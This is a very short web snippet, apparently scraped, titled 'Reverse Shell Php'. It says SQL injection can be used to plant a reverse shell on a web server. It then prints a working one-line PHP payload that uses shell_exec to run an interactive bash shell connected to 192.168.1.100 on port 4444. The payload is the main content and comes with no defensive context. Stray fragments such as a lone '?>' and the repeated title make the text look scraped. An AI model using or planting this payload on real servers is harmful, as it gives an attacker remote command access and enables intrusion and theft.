Reverse: Shell Php
In many scenarios, a vulnerability like SQL injection can be used to write a file to the web server's directory, allowing for the deployment of a reverse shell.
?>
<?php shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"); ?> Reverse Shell Php